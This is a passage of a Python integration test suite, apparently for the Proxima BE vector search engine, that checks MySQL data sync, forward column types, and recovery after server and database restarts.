time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 6
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], ('\xf1' + '\x00' * 15).encode('ISO-8859-1'))
self.assertEqual(documents[i].forward_column_values['f2'], (str(i + 1) * 4 + '\x00' * 60).encode('utf-8'))
self.assertEqual(documents[i].forward_column_values['f3'], ('\xf1' * 3).encode('ISO-8859-1'))
self.assertEqual(documents[i].forward_column_values['f4'], (str(i + 1) * 257).encode('utf-8'))
def test_forward_with_set_and_enum(self):
collection_name = 'test_forward_with_set_and_enum'
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_set_and_enum_full.sql')
self.assertEqual(ret, 0)
# create collection
forward_columns=['f1', 'f2', 'f3', 'f4']
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
forward_columns=forward_columns,
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 4
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], (1 << i) + 128)
self.assertEqual(documents[i].forward_column_values['f2'], (1 << i))
self.assertEqual(documents[i].forward_column_values['f3'], (i + 1))
self.assertEqual(documents[i].forward_column_values['f4'], (i + 1))
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_set_and_enum_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 6
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], (1 << i) + 128)
self.assertEqual(documents[i].forward_column_values['f2'], (1 << i))
self.assertEqual(documents[i].forward_column_values['f3'], (i + 1))
self.assertEqual(documents[i].forward_column_values['f4'], (i + 1))
def test_forward_with_json(self):
collection_name = 'test_forward_with_json'
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_json_full.sql')
self.assertEqual(ret, 0)
# create collection
forward_columns=['f1', 'f2', 'f3', 'f4']
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
forward_columns=forward_columns,
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 4
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], (str(i + 1) * 16))
# self.assertEqual(documents[i].forward[1].key, 'f2')
# self.assertEqual(documents[i].forward_column_values['f2'], (str(i + 1) * 4).encode('utf-8'))
self.assertEqual(documents[i].forward_column_values['f3'], (str(i + 1) * 3))
self.assertEqual(documents[i].forward_column_values['f4'], (str(i + 1) * 257))
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_json_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 6
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], (str(i + 1) * 16))
# self.assertEqual(documents[i].forward_column_values['f2'], (str(i + 1) * 4).encode('utf-8'))
self.assertEqual(documents[i].forward_column_values['f3'], (str(i + 1) * 3))
self.assertEqual(documents[i].forward_column_values['f4'], (str(i + 1) * 257))
def test_forward_with_geometry(self):
collection_name = 'test_forward_with_geometry'
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_geometry_full.sql')
self.assertEqual(ret, 0)
# create collection
forward_columns=['f1', 'f2', 'f3', 'f4']
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
forward_columns=forward_columns,
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 4
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], (str(i + 1) * 16))
# self.assertEqual(documents[i].forward_column_values['f2'], (str(i + 1) * 4).encode('utf-8'))
self.assertEqual(documents[i].forward_column_values['f3'], (str(i + 1) * 3))
self.assertEqual(documents[i].forward_column_values['f4'], (str(i + 1) * 257))
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_geometry_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 6
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], (str(i + 1) * 16))
# self.assertEqual(documents[i].forward_column_values['f2'], (str(i + 1) * 4).encode('utf-8'))
self.assertEqual(documents[i].forward_column_values['f3'], (str(i + 1) * 3))
self.assertEqual(documents[i].forward_column_values['f4'], (str(i + 1) * 257))
def test_forward_with_decimal(self):
collection_name = 'test_forward_with_decimal'
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_decimal_full.sql')
self.assertEqual(ret, 0)
# create collection
forward_columns=['f1', 'f2', 'f3', 'f4']
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
forward_columns=forward_columns,
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 4
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], (str(i + 1) * 16))
self.assertEqual(documents[i].forward_column_values['f2'], '12345.%d123456789' % (i))
self.assertEqual(documents[i].forward_column_values['f3'], (str(i + 1) * 3))
self.assertEqual(documents[i].forward_column_values['f4'], (str(i + 1) * 257))
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_decimal_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 6
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], (str(i + 1) * 16))
self.assertEqual(documents[i].forward_column_values['f2'], '12345.%d123456789' % (i))
self.assertEqual(documents[i].forward_column_values['f3'], (str(i + 1) * 3))
self.assertEqual(documents[i].forward_column_values['f4'], (str(i + 1) * 257))
def test_forward_with_types_null(self):
collection_name = 'test_forward_with_types_null'
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_types_null_full.sql')
self.assertEqual(ret, 0)
# create collection
forward_columns=['f1', 'f2', 'f3', 'f4', 'f5', 'f6', 'f7', 'f8', 'f9', 'f10',
'f11', 'f12', 'f13', 'f14', 'f15', 'f16', 'f17', 'f18', 'f19']
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["f20"],
forward_columns=forward_columns,
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name, column_name='f20')
logging.info("query status: %s", status)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 4
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], (str(i + 1) * 16))
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_types_null_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name, column_name='f20')
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 7
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 2)
self.assertEqual(documents[i].score, (i + 1) * (i + 1))
self.assertEqual(documents[i].forward_column_values['f1'], (str(i + 2) * 16))
def test_forward_with_empty_value(self):
collection_name = 'test_forward_with_empty_value'
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_empty_value_full.sql')
self.assertEqual(ret, 0)
# create collection
forward_columns=['f1', 'f2', 'f3', 'f4', 'f5', 'f6', 'f7', 'f8', 'f9', 'f10',
'f11', 'f12', 'f13', 'f14', 'f15', 'f16', 'f17', 'f18', 'f19']
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["f20"],
forward_columns=forward_columns,
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name, column_name='f20')
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 4
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'],
str(i + 1) * 16)
self.assertEqual(documents[i].forward_column_values['f2'],
"")
self.assertEqual(documents[i].forward_column_values['f3'],
"")
self.assertEqual(documents[i].forward_column_values['f10'],
"")
self.assertEqual(documents[i].forward_column_values['f11'],
"")
self.assertEqual(documents[i].forward_column_values['f12'].decode("utf-8"),
"")
self.assertEqual(documents[i].forward_column_values['f13'], 0)
self.assertEqual(documents[i].forward_column_values['f14'].decode("utf-8"),
"\x00\x00\x00\x00\x00\x00\x00\x00")
self.assertEqual(documents[i].forward_column_values['f15'].decode("utf-8"),
"")
self.assertEqual(documents[i].forward_column_values['f16'], 0)
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_empty_value_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name, column_name='f20')
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 7
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 2)
self.assertEqual(documents[i].score, (i + 1) * (i + 1))
self.assertEqual(documents[i].forward_column_values['f1'],
str(i + 2) * 16)
self.assertEqual(documents[i].forward_column_values['f2'],
"")
self.assertEqual(documents[i].forward_column_values['f3'],
"")
self.assertEqual(documents[i].forward_column_values['f10'],
"")
self.assertEqual(documents[i].forward_column_values['f11'],
"")
self.assertEqual(documents[i].forward_column_values['f12'].decode("utf-8"),
"")
self.assertEqual(documents[i].forward_column_values['f13'], 0)
self.assertEqual(documents[i].forward_column_values['f14'].decode("utf-8"),
"\x00\x00\x00\x00\x00\x00\x00\x00")
self.assertEqual(documents[i].forward_column_values['f15'].decode("utf-8"),
"")
self.assertEqual(documents[i].forward_column_values['f16'], 0)
def test_repository_restart(self):
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_repository_restart_full.sql')
self.assertEqual(ret, 0)
# create collection
collection_name = 'test_repository_restart'
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 2
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.000001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
# get latest lsn
latest_lsn = self.get_latest_lsn(collection_name)
self.assertEqual(latest_lsn.lsn, 2)
# stop mysql repo
self.server_utils.stop_mysql_repo()
# prepare table data
ret = self.mysql_client.execute_batch_sql('data/test_repository_restart_full_1.sql')
self.assertEqual(ret, 0)
# start mysql repo
self.server_utils.start_mysql_repo()
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 4
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.000001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
# get latest lsn
latest_lsn = self.get_latest_lsn(collection_name)
self.assertEqual(latest_lsn.lsn, 4)
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_repository_restart_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 6
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.000001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
# get latest lsn
latest_lsn = self.get_latest_lsn(collection_name)
self.assertEqual(latest_lsn.lsn, 4)
# restart mysql repository
self.server_utils.stop_mysql_repo()
time.sleep(2)
self.server_utils.start_mysql_repo()
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_repository_restart_inc_1.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 7
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.000001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
# get latest lsn
latest_lsn = self.get_latest_lsn(collection_name)
self.assertEqual(latest_lsn.lsn, 4)
def test_proxima_be_restart_with_collection_empty(self):
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_proxima_be_restart_with_collection_empty_meta.sql')
self.assertEqual(ret, 0)
# create collection
collection_name = 'test_proxima_be_restart_with_collection_empty'
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
# stop the proxima be server
self.server_utils.stop_proxima_be()
# start the proxima be server
self.server_utils.start_proxima_be()
time.sleep(5)
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_proxima_be_restart_with_collection_empty_full.sql')
self.assertEqual(ret, 0)
time.sleep(5)
# prepare inc table data
ret = self.mysql_client.execute_batch_sql('data/test_proxima_be_restart_with_collection_empty_inc.sql')
self.assertEqual(ret, 0)
time.sleep(3)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 2
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.000001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
# get latest lsn
latest_lsn = self.get_latest_lsn(collection_name)
self.assertEqual(latest_lsn.lsn, 2)
context = latest_lsn.context
arr = context.split(';')
self.assertEqual(len(arr), 4)
self.assertEqual(arr[3].strip(), '1')
def test_proxima_be_restart_with_full_stage(self):
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_proxima_be_restart_with_full_stage_full.sql')
self.assertEqual(ret, 0)
# create collection
collection_name = 'test_proxima_be_restart_with_full_stage'
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(1)
# stop the proxima be server
self.server_utils.stop_proxima_be()
# logging.info("<<<<<<<<<<< before mysql_repo >>>>>>>>>>>")
# logging.info("%s", self.get_content('mysql_repo.log.INFO'))
# logging.info("<<<<<<<<<<< before proxima_be >>>>>>>>>>>")
# logging.info("%s", self.get_content('proxima_be.log.INFO'))
# start the proxima be server
self.server_utils.start_proxima_be()
time.sleep(5)
# logging.info("<<<<<<<<<<< after mysql_repo >>>>>>>>>>>")
# logging.info("%s", self.get_content('mysql_repo.log.INFO'))
# logging.info("<<<<<<<<<<< after proxima_be >>>>>>>>>>>")
# logging.info("%s", self.get_content('proxima_be.log.INFO'))
# query result
prev_count = 0
while True:
status, response = self.query(collection_name, topk=10000)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 10000
logging.info("actual: %d, prev: %d", len(documents), prev_count)
if len(documents) < count and len(documents) > prev_count:
prev_count = len(documents)
time.sleep(10)
continue
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(len(documents[i].forward_column_values), 2)
break
def test_proxima_be_restart_with_inc_stage(self):
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_proxima_be_restart_with_inc_stage_full.sql')
self.assertEqual(ret, 0)
# create collection
collection_name = 'test_proxima_be_restart_with_inc_stage'
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# prepare inc table data
ret = self.mysql_client.execute_batch_sql('data/test_proxima_be_restart_with_inc_stage_inc_1.sql')
self.assertEqual(ret, 0)
time.sleep(5)
# query result
prev_count = 0
while True:
status, response = self.query(collection_name, topk=10000)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 400
logging.info("actual: %d, prev: %d", len(documents), prev_count)
if len(documents) < count and len(documents) > prev_count:
prev_count = len(documents)
time.sleep(5)
continue
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(len(documents[i].forward_column_values), 2)
break
# stop the proxima be server
self.server_utils.stop_proxima_be()
# start the proxima be server
self.server_utils.start_proxima_be()
time.sleep(5)
# prepare inc table data
ret = self.mysql_client.execute_batch_sql('data/test_proxima_be_restart_with_inc_stage_inc_2.sql')
self.assertEqual(ret, 0)
time.sleep(5)
# query result
prev_count = 0
while True:
status, response = self.query(collection_name, topk=10000)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 2610
if len(documents) < count and len(documents) > prev_count:
prev_count = len(documents)
time.sleep(10)
continue
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(len(documents[i].forward_column_values), 2)
break
# def test_update_collection(self):
# # prepare full table data
# ret = self.mysql_client.execute_batch_sql('data/test_update_collection_full.sql')
# self.assertEqual(ret, 0)
# # create collection
# collection_name = 'test_update_collection'
# schema = self.create_schema(collection_name,
# repository_table=collection_name,
# index_columns=["column1"],
# index_dimensions=[16])
# status = self.client.create_collection(schema)
# self.assertEqual(status.code, 0)
# collection_meta = data["collection"]
# time.sleep(5)
# # query result
# status, response = self.query(collection_name)
# self.assertTrue(status.ok())
# logging.info("query result: %s", response)
# results = response.results
# self.assertEqual(len(results), 1)
# documents = results[0]
# count = 2
# self.assertEqual(len(documents), count)
# for i in range(0, count):
# self.assertEqual(documents[i].primary_key, i + 1)
# self.assertEqual(documents[i].score, i * i)
# self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
# 11.111 + i, delta=0.000001)
# self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
# # get latest lsn
# latest_lsn = self.get_latest_lsn(collection_name)
# self.assertEqual(latest_lsn.lsn, 2)
# # suspend collection
# status = self.client.suspend_collection(collection_name)
# logging.info("suspend collection result: %s", data)
# self.assertEqual(status.code, 0)
# # prepare table data
# ret = self.mysql_client.execute_batch_sql('data/test_update_collection_inc.sql')
# self.assertEqual(ret, 0)
# time.sleep(3)
# # update schema
# self.creator.update_schema(schema, collection_meta)
# status = self.client.update_collection(schema)
# logging.info("update schema: %s", schema)
# logging.info("update result: %s", data)
# self.assertEqual(status.code, 0)
# # resume collection
# status = self.client.resume_collection(collection_name)
# logging.info("resume collection result: %s", data)
# self.assertEqual(status.code, 0)
# time.sleep(5)
# # query result
# status, response = self.query(collection_name)
# self.assertTrue(status.ok())
# logging.info("query result: %s", response)
# results = response.results
# self.assertEqual(len(results), 1)
# documents = results[0]
# count = 4
# self.assertEqual(len(documents), count)
# for i in range(0, count):
# self.assertEqual(documents[i].primary_key, i + 1)
# self.assertEqual(documents[i].score, i * i)
# self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
# 11.111 + i, delta=0.000001)
# self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
# # get latest lsn
# latest_lsn = self.get_latest_lsn(collection_name)
# self.assertEqual(latest_lsn.lsn, 4)
def test_collection_create_and_remove(self):
# create collection
collection_name = 'test_collection_create_and_remove'
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
# send data
ret = self.mysql_client.execute_batch_sql('data/test_collection_create_and_remove_full.sql')
self.assertEqual(ret, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 2
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.000001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
# remove the collection
status = self.client.drop_collection(collection_name)
self.assertEqual(status.code, 0)
time.sleep(2)
# recreate the collection
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 2
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.000001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
def test_mysql_restart_with_full_mode(self):
# send data
ret = self.mysql_client.execute_batch_sql('data/test_mysql_restart_with_full_mode_full.sql')
self.assertEqual(ret, 0)
# create collection
collection_name = 'test_mysql_restart_with_full_mode'
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
# # suspend collection
# status = self.client.suspend_collection(collection_name)
# logging.info("suspend collection result: %s", data)
# self.assertEqual(status.code, 0)
# time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
# stop mysql
self.server_utils.stop_mysql()
time.sleep(2)
# start mysql
self.server_utils.start_mysql()
time.sleep(2)
# # resume collection
# status = self.client.resume_collection(collection_name)
# logging.info("resume collection result: %s", data)
# self.assertEqual(status.code, 0)
time.sleep(10)
# query result
status, response = self.query(collection_name, topk=300)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 300
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
def test_mysql_restart_with_inc_mode(self):
# send full data
ret = self.mysql_client.execute_batch_sql('data/test_mysql_restart_with_inc_mode_full.sql')
self.assertEqual(ret, 0)
# create collection
collection_name = 'test_mysql_restart_with_inc_mode'
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name, topk=300)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 100
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
# send inc1 data
ret = self.mysql_client.execute_batch_sql('data/test_mysql_restart_with_inc_mode_inc_1.sql')
self.assertEqual(ret, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name, topk=300)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 200
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
# stop mysql
self.server_utils.stop_mysql()
time.sleep(2)
# start mysql
self.server_utils.start_mysql()
time.sleep(2)
# send inc2 data
ret = self.mysql_client.execute_batch_sql('data/test_mysql_restart_with_inc_mode_inc_2.sql')
self.assertEqual(ret, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name, topk=300)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 300
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
def test_mysql_restart_with_create_collection(self):
# send full data
ret = self.mysql_client.execute_batch_sql('data/test_mysql_restart_with_create_collection_full.sql')
self.assertEqual(ret, 0)
# stop mysql
self.server_utils.stop_mysql()
time.sleep(2)
# create collection
collection_name = 'test_mysql_restart_with_create_collection'
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name, topk=300)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 0
self.assertEqual(len(documents), count)
# start mysql
self.server_utils.start_mysql()
time.sleep(5)
# query result
status, response = self.query(collection_name, topk=300)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 100
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
def test_multi_collections(self):
# create collection
collections = []
collection_count = 5
repository_table = 'test_multi_collections'
for i in range(0, collection_count):
collection = 'test_multi_collections_' + str(i)
collections.append(collection)
schema = self.create_schema(collection,
repository_table=repository_table,
index_columns=["column1"],
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
# send full data
ret = self.mysql_client.execute_batch_sql('data/test_multi_collections_full.sql')
self.assertEqual(ret, 0)
time.sleep(10)
# query result
topk = 300
for i in range(0, collection_count):
collection = 'test_multi_collections_' + str(i)
status, response = self.query(collection, topk=topk)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 100
self.assertEqual(len(documents), count)
for i in range(0, count):
